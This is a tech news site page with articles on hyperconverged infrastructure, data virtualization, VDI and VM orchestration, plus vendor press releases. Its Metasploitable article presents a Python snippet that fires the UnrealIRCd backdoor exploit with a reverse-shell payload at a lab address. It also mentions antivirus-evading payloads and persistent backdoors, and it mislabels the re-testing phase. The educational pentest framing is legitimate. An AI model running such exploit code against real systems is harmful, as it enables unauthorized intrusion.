8 reasons to consider hyperconverged infrastructure for your data center

Demand for on-premises data center equipment is shrinking as organizations move workloads to the cloud. But on-prem is far from dead, and one segment that’s thriving is hyperconverged infrastructure (HCI). HCI is a form of scale-out, software-integrated infrastructure that applies a modular approach to compute, network, and storage capacity. Rather than siloed tiers of specialized hardware, HCI uses distributed, horizontal blocks of commodity hardware and delivers a single-pane dashboard for reporting and management. Form factors vary: enterprises can deploy hardware-agnostic hyperconvergence software from vendors such as Nutanix and VMware, or an integrated HCI appliance from vendors such as Hewlett Packard Enterprise, Dell, Cisco, and Lenovo.

Spotlight

Kineto Wireless

Kineto, now a part of Taqua, strives to assist mobile operators in the transition to IP-based services. Our solutions help operators respond to the growing threat from over-the-top (OTT) service providers and remain competitive as communications service providers.

OTHER ARTICLES
Server Hypervisors

Metasploitable: A Platform for Ethical Hacking and Penetration Testing

Article | May 18, 2023

Contents
1. Overview
2. Ethical Hacking and Penetration Testing
3. Metasploit Penetration Test
4. Why Choose the Metasploit Framework for Your Business?
5. Closing Remarks

1. Overview
Metasploitable is an intentionally vulnerable virtual machine that enables the learning and practice of Metasploit. Metasploit is one of the leading penetration testing frameworks; it helps businesses discover and shore up vulnerabilities in their systems before hackers exploit them. Security engineers use Metasploit both as a penetration testing system and as a development platform for creating security tools and exploits. Metasploit's user interfaces, libraries, tools, and modules let users configure an exploit module, pair it with a payload, point it at a target, and launch it against the target system. In addition, Metasploit's extensive database houses hundreds of exploits and several payload options.

2. Ethical Hacking and Penetration Testing
An ethical hacker works within a security framework and checks for the bugs that a malicious hacker could use to exploit networks, applying their experience and skills to make the cyber environment more secure. Ethical hacking is essential for protecting infrastructure from the threats hackers pose; its main purpose is to assess the safety of the targeted systems and networks and report the findings to the owner. Ethical hacking relies on penetration testing techniques to evaluate security loopholes, including:
– Information gathering
– Vulnerability scanning
– Exploitation
– Test analysis
Ethical hacking depends heavily on automated methods; without automated software, the process is inefficient and time-consuming. Several tools and methods can be used for ethical hacking and penetration testing. The Metasploit Framework eases the effort of exploiting vulnerabilities in networks, operating systems, and applications, and of generating new exploits for new or unknown vulnerabilities.

3. Metasploit Penetration Test
Reconnaissance: Integrate Metasploit with various reconnaissance tools to find the vulnerable spots in the system.
Threat Modeling and Vulnerability Identification: Once a weakness is identified, choose an exploit and a payload for penetration.
Exploitation: If the exploit (the tool used to take advantage of a system weakness) succeeds, the payload is executed on the target, and the user gets a shell for interacting with it (a shellcode is a small piece of code used as the payload). The most popular payload for attacking Windows systems is Meterpreter, an in-memory-only interactive shell that lets the attacker explore the target machine and execute code. Other payload types include:
– Static payloads, which enable port forwarding and communication between networks
– Dynamic payloads, which let testers generate unique payloads to evade antivirus software
– Command shell payloads, which enable users to run scripts or commands against a host
Post-Exploitation: Once on the target machine, Metasploit offers tools for privilege escalation, packet sniffing, keylogging, screen capture, and pivoting.
Resolution and Re-Testing: Users set up a persistent backdoor in case the target machine gets rebooted.
These features make Metasploit easy to configure to the user's requirements.
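As a rough illustration of the configure-pair-launch flow above, the following sketch drives Metasploit's RPC interface from Python. It assumes the third-party pymetasploit3 library and a running msfrpcd instance; the module names, password, and addresses are illustrative placeholders for a lab target such as Metasploitable 2, not a prescribed attack.

```python
# Minimal sketch only, for lab use against an intentionally vulnerable VM.
# Assumes `msfrpcd -P s3cr3t` is running and pymetasploit3 is installed.
from pymetasploit3.msfrpc import MsfRpcClient

client = MsfRpcClient('s3cr3t', ssl=True)             # connect to the RPC daemon

# Configure an exploit module and point it at the target (illustrative IPs).
exploit = client.modules.use('exploit', 'unix/irc/unreal_ircd_3281_backdoor')
exploit['RHOSTS'] = '192.168.56.103'                  # Metasploitable 2 VM

# Pair the exploit with a payload.
payload = client.modules.use('payload', 'cmd/unix/reverse')
payload['LHOST'] = '192.168.56.1'                     # attacker / listener address

# Launch it at the target system, then list any sessions that were opened.
exploit.execute(payload=payload)
print(client.sessions.list)
```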
4. Why Choose the Metasploit Framework for Your Business?
Significant advantages of the Metasploit Framework include:
Open source: The Metasploit Framework is actively developed as open-source software, which is why many companies prefer it as they grow.
Easy usage: The framework is easy to use, with a consistent naming convention for its commands, which also simplifies building an extensive penetration test of the network.
GUI environment: Third-party graphical interfaces ease penetration testing projects with features such as one-click actions, on-the-fly vulnerability management, and easy-to-switch workspaces.
Cleaner exits: Metasploit can exit cleanly without detection, even if the target system does not restart after a penetration test. It also offers various options for maintaining persistent access to the target system.
Easy switching between payloads: The 'set payload' command lets testers change payloads easily, offering the flexibility to penetrate a system through shell-based access or Meterpreter.

5. Closing Remarks
From DevSecOps experts to hackers, everyone uses the Ruby-based open-source Metasploit Framework, which supports testing from the command line or through a GUI. Metasploitable is a vulnerable virtual machine ideally suited to ethical hacking and penetration testing in VM security. One trend likely to shape Metasploitable's future is the increasing use of cloud-based environments for testing and production; Metasploitable may be adapted to work in cloud environments, or new tools may emerge specifically for cloud-based penetration testing. Another is the growing importance of automation in security testing, so Metasploitable could gain more automation features. The future of Metasploitable looks bright as it remains a valuable tool for security professionals and enthusiasts, and as the security landscape evolves, it will be interesting to see how Metasploitable adapts to the community's changing needs.

Read More
Virtual Desktop Strategies

How to Start Small and Grow Big with Data Virtualization

Article | July 26, 2022

Why Should Companies Care about Data Virtualization?
Data is everywhere. With each passing day, companies generate more data than ever before, and what exactly can they do with all of it? Is it just a matter of storing it? Or should they manage and integrate their data from its various sources? How can they store, manage, integrate, and utilize their data to gain information of critical value to their business? As they say, knowledge is power, but knowledge without action is useless. This is where the Denodo Platform comes in. The Denodo Platform gives companies the flexibility to evolve their data strategies, migrate to the cloud, or logically unify their data warehouses and data lakes without affecting the business. This powerful platform offers a variety of subscription options that can benefit companies immensely. For example, companies often start out with individual projects using a Denodo Professional subscription, but in a short period of time they end up adding more and more data sources and move on to other subscriptions such as Denodo Enterprise or Denodo Enterprise Plus. The upgrade process is very easy to establish; in fact, it can be done in less than a day once the cloud marketplace is chosen (Amazon Web Services (AWS), Microsoft Azure, or Google Cloud Platform (GCP)). In as little as six weeks, companies can realize real business benefits from managing and utilizing their data effectively.

A Bridging Layer
Data virtualization has been around for quite some time. Denodo’s founders, Angel Viña and Alberto Pan, have been involved in data virtualization since as far back as the 1990s. If you’re not familiar with data virtualization, here is a quick summary. Data virtualization is the cornerstone of a logical data architecture, whether it be a logical data warehouse, logical data fabric, data mesh, or even a data hub. All of these architectures are best served by our principles: Combine (bring together all your data sources), Connect (into a logical single view), and Consume (through standard connectors to your favorite BI/data science tools or through our easy-to-use, robust APIs). Data virtualization is the bridge that joins multiple data sources to fuel analytics. It is also the logical data layer that integrates data silos across disparate systems, manages unified data for centralized security, and delivers it to business users in real time.

Economic Benefits in Less Than Six Weeks with Data Virtualization?
How can companies benefit from choosing data virtualization as a data management solution in such a short time? To answer this question, below are some very interesting KPIs discussed in the recently released Forrester study on the Total Economic Impact of Data Virtualization. For example, companies that have implemented data virtualization have seen an 83% increase in business user productivity, mainly due to the business-centric way a data virtualization platform is delivered: business users get an easy-to-access, democratized interface to the data they need. The second KPI to note is a 67% reduction in development resources. With data virtualization, you connect to the data, you do not copy it. This means that once it is set up, there is a significant reduction in the need for data integration engineers, as data remains in the source location and is not copied around the enterprise.
Finally, companies report a 65% improvement in data access speeds over more traditional approaches such as extract, transform, and load (ETL) processes.

A Modern Solution for an Age-Old Problem
To understand how data virtualization can help elevate projects to an enterprise level, consider a few use cases in which companies have leveraged data virtualization to solve business problems across several industries. In finance and banking, we often see data virtualization used as a unifying platform to help improve compliance and reporting. In retail, we see use cases that include predictive analytics in supply chains as well as next-best-action decisions from a unified view of the customer. Data virtualization also serves a wider variety of situations, such as healthcare and government agencies, where organizations use the Denodo Platform to help data scientists understand key trends and activities, both sociologically and economically. In a nutshell, if data exists in more than one source, the Denodo Platform acts as the unifying layer that connects, combines, and allows users to consume the data in a timely, cost-effective manner.
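As a minimal illustration of the "Consume" step, the sketch below queries a single logical view over ODBC instead of copying data out of the source systems. It assumes a pre-configured ODBC DSN pointing at the virtual layer; the DSN, view, column, and credential names are hypothetical.

```python
# Minimal sketch: consuming a logical (virtual) view over ODBC instead of copying data.
# Assumes a DSN named "virtual_layer" points at the data virtualization server.
import pyodbc

conn = pyodbc.connect("DSN=virtual_layer;UID=report_user;PWD=secret")
cursor = conn.cursor()

# The hypothetical "customer_360" view federates CRM, billing, and web-analytics
# sources at query time; no ETL copy of the underlying tables exists.
cursor.execute(
    "SELECT customer_id, lifetime_value, last_interaction "
    "FROM customer_360 WHERE region = ?",
    ("EMEA",),
)
for row in cursor.fetchmany(10):
    print(row.customer_id, row.lifetime_value, row.last_interaction)

conn.close()
```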

Read More
Server Hypervisors

Why Are Businesses Tilting Towards VDI for Remote Employees?

Article | September 9, 2022

Although remote working or working from home became popular during the COVID era, did you know that the technology that provides the best user experience (UX) for remote work was developed more than three decades ago? Citrix was founded in 1989 as one of the first software businesses to provide the ability to execute any program on any device over any connection. In 2006, VMware coined the term "virtual desktop infrastructure (VDI)" to designate its virtualization products. Many organizations created remote work arrangements in response to the COVID-19 pandemic, and the phenomenon will continue even in 2022. Organizations have used a variety of methods to facilitate remote work over the years, and VDI has been one of the most effective, allowing businesses to centralize their IT resources and give users remote access to a consolidated pool of computing capacity.

Reasons Why Businesses Should Use VDI for Their Remote Employees
Companies can find it difficult to scale their operations and grow while operating remotely. VDI, however, can assist these efforts by eliminating some of the downsides of remote work.

Device Agnostic
As long as employees have sufficient internet connectivity, virtual desktops can accompany them across the world. They can use a tablet, phone, laptop, thin client, or Mac to access the virtual desktop.

Reduced Support Costs
Since VDI setups can often be handled by a smaller IT workforce than traditional PC environments, support expenses go down.

Enhanced Security
Data security improves because data never leaves the data center. There is no need to worry about every hard disk in every computer containing sensitive data; nothing is stored on the end machine while using the VDI workspace. It also safeguards intellectual property when dealing with contractors, partners, or a worldwide workforce.

Comply with Regulations
With virtual desktops, organizational data never leaves the data center. Remote employees with regulatory duties to protect client or patient data can work this way because there is no risk of data leaking from a lost or stolen laptop or a retired PC.

Enhanced User Experience
With a solid user experience (UX), employees can work from anywhere. They can connect to all of their business applications and tools from wherever they choose to call the workplace, exactly as if sitting at their office desk, and even answer the phone if they really want to.

Closing Lines
One of COVID-19's lessons has been to be prepared for almost anything. IT leaders were probably not planning their investments with a pandemic in mind. Regardless of how the pandemic plays out in the future, the rise of remote work is here to stay. If VDI at scale is to become a permanent feature of business IT strategies, now is the moment to assess where, when, and how your organization can implement the appropriate solutions. Moreover, businesses that use VDI could find that the added flexibility extends their computing refresh cycles.

Read More
Virtual Desktop Strategies, Server Hypervisors

Efficient Management of Virtual Machines using Orchestration

Article | April 27, 2023

Contents
1. Introduction
2. What is Orchestration?
3. How Does Orchestration Help Optimize VM Efficiency?
3.1 Resource Optimization
3.2 Dynamic Scaling
3.3 Faster Deployment
3.4 Improved Security
3.5 Multi-Cloud Management
3.6 Improved Collaboration
4. Considerations while Orchestrating VMs
4.1 Together Hosting of Containers and VMs
4.2 Automated Backup and Restore for VMs
4.3 Ensure Replication for VMs
4.4 Set Up Data Synchronization for VMs
5. Conclusion

1. Introduction
Orchestration is a superset of automation. Cloud orchestration goes beyond automation, providing coordination between multiple automated activities. It is increasingly essential due to the growth of containerization, which facilitates scaling applications across both public and private clouds. The demand for public cloud orchestration and hybrid cloud orchestration has increased as businesses adopt hybrid cloud architectures. The quick adoption of containerized, microservices-based apps that communicate over APIs has fueled the desire to automate the deployment and management of applications across the cloud. This increase in complexity has created a need for VM orchestration that can manage numerous dependencies across various clouds with policy-driven security and management capabilities.

2. What is Orchestration?
Orchestration refers to the process of automating, coordinating, and managing complex systems, workflows, or processes. It typically entails the use of automation tools and platforms to streamline and coordinate the deployment, configuration, and management of applications and services across different environments, including development, testing, staging, and production. Orchestration tools in cloud computing can automate the deployment and administration of containerized applications across multiple servers or clusters, handling tasks such as container provisioning, scaling, load balancing, and health monitoring, which makes it easier to manage complex application environments. Orchestration lets organizations automate and streamline their workflows, reduce errors and downtime, and improve the efficacy and scalability of their operations.

3. How Does Orchestration Help Optimize VM Efficiency?
Orchestration offers enhanced visibility into the resources and processes in use, which helps prevent VM sprawl and helps organizations trace resource usage by department, business unit, or individual user.
[Figure: Global Market for VNFO by Virtualization Methodology, 2022-27 ($ million). Source: Insight Research]
As the figure shows, VMs have established a solid legacy that will continue to be relevant in the near- to mid-term future. Orchestration helps in the efficient management of VMs in six ways:

3.1 Resource Optimization
Orchestration helps optimize resource utilization by automating the provisioning and de-provisioning of VMs, which allows for efficient use of computing resources. Using orchestration tools, IT teams can set up rules and policies for automatically scaling VMs based on criteria such as CPU utilization, memory usage, network traffic, and application performance metrics. Orchestration also enables advanced techniques such as predictive analytics, machine learning, and artificial intelligence to optimize resource utilization. These technologies can analyze historical data and identify patterns in workload demand, allowing the orchestration system to predict future resource needs and automatically provision or de-provision resources accordingly.
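To make the threshold-driven policy above concrete, here is a minimal, platform-agnostic sketch of a single autoscaling evaluation pass. The provisioning callbacks and thresholds are placeholders for whatever API the orchestration platform actually exposes.

```python
from typing import Callable, List

SCALE_UP_CPU = 0.80      # provision another VM when average CPU stays above 80%
SCALE_DOWN_CPU = 0.30    # deprovision one when average CPU falls below 30%
MIN_VMS, MAX_VMS = 2, 10

def autoscale(vms: List[str],
              get_avg_cpu: Callable[[List[str]], float],
              provision_vm: Callable[[], str],
              deprovision_vm: Callable[[str], None]) -> None:
    """One evaluation pass of a CPU-threshold scaling policy."""
    avg_cpu = get_avg_cpu(vms)
    if avg_cpu > SCALE_UP_CPU and len(vms) < MAX_VMS:
        vms.append(provision_vm())        # scale out under sustained load
    elif avg_cpu < SCALE_DOWN_CPU and len(vms) > MIN_VMS:
        deprovision_vm(vms.pop())         # scale in to free unused resources

# In a real orchestrator this would run on a schedule (e.g. every 60 seconds):
#   autoscale(current_vms, metrics.avg_cpu, platform.create_vm, platform.delete_vm)
```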
3.2 Dynamic Scaling
Orchestration automates the scaling of VMs, enabling organizations to quickly and easily adjust their computing resources based on demand. IT teams can configure scaling policies for virtual machines based on resource utilization, network traffic, and performance metrics. When workload demand exceeds a defined threshold, the orchestration system can autonomously provision additional virtual machines to accommodate the increased load; when demand decreases, it can deprovision VMs to free up resources and reduce costs.

3.3 Faster Deployment
Orchestration can automate the deployment of VMs, reducing the time and effort required to provision new resources. By leveraging automation, scripting, and APIs, orchestration further streamlines the VM deployment process: IT teams can define workflows and processes that are automated with scripts. In addition, orchestration can integrate with other IT management tools and platforms, such as cloud management platforms, configuration management tools, and monitoring systems, letting IT teams combine these capabilities and services to streamline VM deployment and improve efficiency.

3.4 Improved Security
Orchestration can enhance the security of VMs by automating the deployment of security patches and updates. It also helps ensure VMs are deployed with the appropriate security configurations and settings, reducing the risk of misconfiguration and vulnerability; IT teams can define standard security templates and configurations for VMs that are applied automatically during deployment. Furthermore, orchestration can integrate with other security tools and platforms, such as intrusion detection systems and firewalls, to provide a comprehensive security solution, automating the deployment of security policies and rules so that workloads remain protected against various threats.

3.5 Multi-Cloud Management
Orchestration provides a single pane of glass for VM management, enabling IT teams to monitor and manage VMs across multiple cloud environments from a single platform. This simplifies management and reduces complexity, so IT teams can respond more quickly and effectively to changing business requirements, and it helps ensure consistency and compliance across multiple cloud environments. Orchestration can also integrate with other multi-cloud management tools and platforms, such as cloud brokers and cloud management platforms, to provide a comprehensive solution for managing VMs across multiple clouds.

3.6 Improved Collaboration
Orchestration streamlines collaboration by providing a centralized repository for storing and sharing information related to VMs. It also automates many of the routine tasks associated with VM management, reducing the workload for IT teams and freeing up time for more complex tasks, which improves collaboration by letting IT teams focus on more strategic initiatives. In addition, orchestration provides advanced analytics and reporting capabilities, enabling IT teams to track performance, identify bottlenecks, and optimize resource utilization. This improves performance by providing a data-driven approach to VM management and allowing IT teams to work collaboratively to identify and address performance issues.

4. Considerations while Orchestrating VMs
4.1 Together Hosting of Containers and VMs
Containers and virtual machines can exist together within a single infrastructure and be managed by the same platform. This allows various projects to be hosted from a unified management point, with the ability to adapt gradually based on current needs and opportunities, and gives teams greater flexibility to host and administer applications using both cutting-edge technologies and established standards and methods. Moreover, because there is no need to invest in distinct physical servers for virtual machines (VMs) and containers, this approach can maximize infrastructure utilization, resulting in lower TCO and higher ROI. Unified management also drastically simplifies processes, requiring fewer human resources and less time.

4.2 Automated Backup and Restore for VMs: Minimize Downtime and Reduce the Risk of Data Loss
Organizations should set up automated backup and restore processes for virtual machines, ensuring critical data and applications are protected during a disaster. This involves scheduling regular backups of virtual machines to a secondary location or cloud storage and setting up automated restore processes so virtual machines can be recovered quickly during an outage or disaster (a minimal scheduling sketch follows this section).

4.3 Ensure Replication for VMs: Keep Data and Applications Available and Accessible in the Event of a Disaster
Organizations should set up replication processes for their VMs, allowing them to be automatically copied to a secondary location or cloud infrastructure. This ensures that critical applications and data remain available even during a catastrophic failure at the primary site.

4.4 Set Up Data Synchronization for VMs: Improve the Overall Resilience and Availability of the System
VM orchestration tools should be used to set up data synchronization processes between virtual machines, ensuring that data is consistent and up to date across multiple locations. This is particularly important where data needs to be accessed quickly from various locations, such as in distributed environments.
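As a minimal sketch of the automated backup consideration in 4.2, the following uses the libvirt Python bindings to snapshot a guest on a local KVM host and prune old snapshots. The guest name, retention count, and qemu:///system URI are illustrative, and a production setup would also copy the backup data to a secondary site, in line with 4.3.

```python
# Minimal sketch, not production code: nightly snapshot of one KVM guest via libvirt.
# Assumes the libvirt-python bindings and a local hypervisor at qemu:///system.
import datetime
import libvirt

VM_NAME = "db-vm-01"   # hypothetical guest
KEEP_LAST = 7          # retain roughly one week of nightly snapshots

def nightly_snapshot() -> None:
    conn = libvirt.open("qemu:///system")
    try:
        dom = conn.lookupByName(VM_NAME)
        stamp = datetime.datetime.now().strftime("%Y%m%d-%H%M")
        xml = ("<domainsnapshot>"
               f"<name>auto-{stamp}</name>"
               "<description>automated nightly snapshot</description>"
               "</domainsnapshot>")
        dom.snapshotCreateXML(xml, 0)                       # take the snapshot
        snaps = sorted(dom.listAllSnapshots(), key=lambda s: s.getName())
        for old in snaps[:-KEEP_LAST]:                      # prune the oldest
            old.delete()
    finally:
        conn.close()

if __name__ == "__main__":
    nightly_snapshot()   # schedule via cron or a systemd timer for a regular cadence
```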
5. Conclusion
Orchestration provides disaster recovery and business continuity, automatic scalability of distributed systems, and inter-service configuration. Cloud orchestration is becoming significant due to the advent of containerization, which permits scaling applications across both public and private clouds. We expect continued growth and innovation in the field of VM orchestration, with new technologies and tools emerging to support more efficient and effective management of virtual machines in distributed environments. As organizations increasingly rely on cloud-based infrastructures and distributed systems, VM orchestration will continue to play a vital role in enabling businesses to operate smoothly and recover quickly from disruptions, and it will remain a critical component of disaster recovery and high-availability strategies for years to come as organizations keep relying on virtualization technologies to power their operations and drive innovation.

Read More

Related News

Virtualized Environments

VeriSilicon Unveils the New VC9800 IP for Next Generation Data Centers

Business Wire | January 09, 2024

VeriSilicon today unveiled its latest VC9800 series Video Processor Unit (VPU) IP with enhanced video processing performance to strengthen its presence in data center applications. The newly launched series IP caters to the advanced requirements of next-generation data centers, including video transcoding servers, AI servers, virtual cloud desktops, and cloud gaming. The VC9800 series of VPU IP boasts high performance, high throughput, and server-level multi-stream encoding and decoding capabilities. It can handle up to 256 streams and support all mainstream video formats, including the new advanced format VVC. Through Rapid Look Ahead encoding, the VC9800 series IP improves video quality significantly with a low memory footprint and low encoding latency. Capable of supporting 8K encoding and decoding, it offers enhanced video post-processing and multi-channel encoding at various resolutions, thus achieving an efficient transcoding solution. The VC9800 series of VPU IP can seamlessly interface with Neural Network Processor (NPU) IP, enabling a complete AI-video pipeline. When combined with VeriSilicon’s Graphics Processor Unit (GPU) IP, the subsystem solution is able to deliver enhanced gaming experiences. In addition, the hardware virtualization, super resolution image enhancement, and AI-enabled encoding functions of this series IP also offer effective solutions for virtual cloud desktops. “VeriSilicon’s advanced video transcoding technology continues leading in Data Center domain. We are working closely with global leading customers to develop comprehensive video processing subsystem solutions to meet the requirements of the latest Data Centers,” said Wei-Jin Dai, Executive VP and GM of IP Division of VeriSilicon. “For AI computing, our video post-processing capabilities have been extended to smoothly interact with NPUs, ensuring OpenCV-level accuracy. We’ve also introduced super resolution technology to the video processing subsystem, elevating image quality and ultimately enhancing user experiences for cloud computing and smart display.” About VeriSilicon VeriSilicon is committed to providing customers with platform-based, all-around, one-stop custom silicon services and semiconductor IP licensing services leveraging its in-house semiconductor IP.

Read More

Backup and Disaster Recovery

Minimize the Cost and Downtime of Disaster With Scale Computing's Business Continuity/Disaster Recovery Planning Service

PR Newswire | October 25, 2023

Scale Computing, a market leader in edge computing, virtualization, and hyperconverged solutions, today announced its Business Continuity/Disaster Recovery (BCDR) Planning Service, designed to help organizations establish a comprehensive, regulated plan for responding to unforeseen downtime. The service provides Scale Computing customers and partners with the tools, guidance, and resources to create a playbook for data backup and recovery, enabling businesses to endure a disaster scenario with minimal loss. Scale Computing also recently announced that it is a finalist for the Business Continuity/Disaster Recovery Project of the Year in the 2023 SDC Awards for its work with Austrian managed service provider GiGaNet and its long-time partner the Zillertaler Gletscherbahn group. Voting for the SDC Awards is open at sdcawards.com/vote until November 10th, 2023. Data breaches are one of the biggest and most costly contributors to downtime for businesses. In 2023, the average cost of a data breach globally reached an all-time high of $4.45 million, a 15.3% increase from 2020. Simultaneously, the average length of business disruption following a ransomware attack in the United States reached 24 days last year, up 60% from just two years prior — a significant increase when downtime costs exceed $300,000 per hour for over 90% of mid-sized and large enterprises. For more than half of those businesses, the hourly outage costs range from $1 million to over $5 million. Recovery from an outage adds additional expense from which many enterprises are unable to bounce back. "Disaster can strike at any time, and every organization needs a consistently regulated playbook for how the business will respond — from action plans to recovery plans for bringing online the mission-critical servers businesses depend on," said Jeff Ready, CEO and co-founder, Scale Computing. "Knowing what systems need to be protected, planning for the ability to recover them, and having a full action plan for recovery should be at the forefront of every IT department's agenda, at the beginning of any infrastructure addition. With Scale Computing Platform, the plan for disaster recovery starts before equipment is even put into production, so IT leaders have a plan in place from day one that they can enact to ensure their business stays up and running, with minimal loss, should disaster strike. Our Business Continuity/Disaster Recovery Planning Service enables businesses to proactively classify systems based on their importance and implement a robust action plan, ensuring that our customers' and partners' critical systems are protected, validated, tested, and ready for recovery at any time." Whether a minor data loss or a business-wide shutdown, having a well-defined business continuity strategy is crucial to minimize financial impact, ensure continuous employee productivity, meet compliance and regulatory requirements, decrease liability obligations, reduce downtime, and minimize the risk of negative exposure. Scale Computing's BCDR Planning Service includes planning, deployment, documentation creation, and disaster recovery testing, covering every aspect to keep businesses prepared and resilient. The service is offered to Scale Computing Platform customers, which brings simplicity, high availability, and scalability together to replace existing infrastructure for running virtual machines with an easy-to-manage, fully integrated platform that allows organizations to run applications regardless of hardware requirements. 
About Scale Computing Scale Computing is a leader in edge computing, virtualization, and hyperconverged solutions. Using patented HyperCore™ technology, Scale Computing Platform automatically identifies, mitigates, and corrects infrastructure problems in real-time, enabling applications to achieve maximum uptime, even when local IT resources and staff are scarce. Edge Computing is the fastest-growing area of IT infrastructure, and industry analysts have named Scale Computing an outperformer and leader in the space, including being named the #1 edge computing vendor by CRN. Scale Computing's products are sold by thousands of value-added resellers, integrators, and service providers worldwide.

Read More

Server Virtualization, VMware

StorMagic Introduces Edge Control Software to Simplify SvSAN Monitoring and Management

Business Wire | October 18, 2023

StorMagic®, solving the world’s edge data problems, today announced the immediate availability of a new Software as a Service (SaaS) tool that allows users to easily monitor and manage all of their SvSAN clusters around the world. StorMagic Edge Control simplifies the process and tools required for day-to-day SvSAN cluster administration. SvSAN customers with multiple locations can significantly reduce the time spent managing their edge sites, whether they are using VMware, Microsoft or KVM hypervisors. “ESG research shows increasing demand for data storage at the edge which fuels an increased need for monitoring solutions that can help address the complexity of storage at the edge,” said Scott Sinclair, practice director at Enterprise Strategy Group. “SvSAN customers can greatly benefit by adding StorMagic Edge Control into their toolkits; the dashboard views and list formats will make centralized data management much easier and more accessible.” Edge Control delivers centralized administration for SvSAN environments of all sizes. Customers can now manage all SvSAN deployments in any location from a single pane of glass. Dashboard and system views provide a fast but comprehensive status of all of their virtual storage appliances (VSAs), allowing them to keep their environment up-to-date more easily and react faster as needed. “StorMagic customers of any size can now manage their entire SvSAN estate, whether it’s one site or thousands of sites around the world,” said Bruce Kornfeld, chief marketing and product officer, StorMagic. “Edge Control is particularly interesting for customers who are considering switching from VMware to Microsoft or Linux KVM because SvSAN and Edge Control are both hypervisor agnostic.” Pricing and Availability Edge Control version 1.0 is available today from StorMagic. SvSAN customers can download and begin using the software immediately, free of charge. About StorMagic StorMagic is solving the world’s edge data problems. We help organizations store, protect and use data at and from the edge. StorMagic’s solutions ensure data is always protected and available, no matter the type or location, to provide value anytime, anywhere. StorMagic’s storage and security products are flexible, robust, easy to use and cost-effective, without sacrificing enterprise-class features, for organizations with one to thousands of sites.

Read More

Events